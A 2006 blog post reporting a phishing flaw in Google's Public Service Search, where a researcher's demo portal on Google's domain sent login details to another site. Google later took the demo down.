Powered by Blogger

15 September 2006
  Google Public Search service
Note: I had been holding back on this entry, but since this flaw has gone public elsewhere, I suppose it's okay to post again.

If you go to this website, it claims to give you access to a new Google Plus service. Don't believe it (go ahead and try it though).

Google Public Service Search allows universities and non-profit organizations to create a custom search portal that seems to be hosted on Google's server. The page is arbitrary (made by the organization) and can thus contain forms that post to *any* server on the Web.

Eric Farraro has taken advantage of lax filtering of how organizations get to use the service, and has put up a search portal that appears to be a Google service. The form, however, submits to another domain and deceptively takes a person's credentials too. When I visited the site, it appeared like I was logging into a google service (since it's the domain), but end up at a different site entirely.

People trust to be Google, and not someone else. This case shows how someone can use the domain but completely redirect unsuspecting people to another site.

Link to discovery (and details)
Comments on Digg
Google Public Search services

(Thanks, Steve!)

UPDATE (15-Aug 4:05pm): Google has taken down the demo and replaced it with a 403: forbidden error. Screenshots are on Eric Farraro's site.